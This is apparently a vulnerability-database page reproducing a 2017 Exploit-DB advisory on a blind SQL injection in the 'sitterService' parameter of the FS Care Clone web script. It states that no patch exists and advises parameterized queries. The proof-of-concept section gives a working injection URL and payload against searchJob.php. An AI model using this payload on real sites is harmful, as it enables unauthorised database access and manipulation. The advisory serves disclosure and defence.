FS Care Clone - 'sitterService' SQL Injection

vendor:

FS Care Clone

by:

8bitsec

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: FS Care Clone

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Kali Linux 2.0, Mac OS 10.12.6

2017

FS Care Clone – ‘sitterService’ SQL Injection

SQL injection on [sitterService] parameter. The vulnerability allows an attacker to inject SQL queries into the parameter and manipulate the database.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to avoid using the affected software or to implement strong input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: FS Care Clone - 'sitterService' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/care-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec

Release Date:
=============
2017-10-24

Product & Service Introduction:
===============================
This product brings the most ideal solution to launch a portal dealing with every aspect of hiring care in a hasslefree manner.

Technical Details & Description:
================================

SQL injection on [sitterService] parameter.

Proof of Concept (PoC):
=======================

SQLi:

https://localhost/[path]/searchJob.php?sitterService=1' AND 2728=2728 AND 'fhir'='fhir

Parameter: sitterService (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sitterService=1' AND 2728=2728 AND 'fhir'='fhir
    
==================
8bitsec - [https://twitter.com/_8bitsec]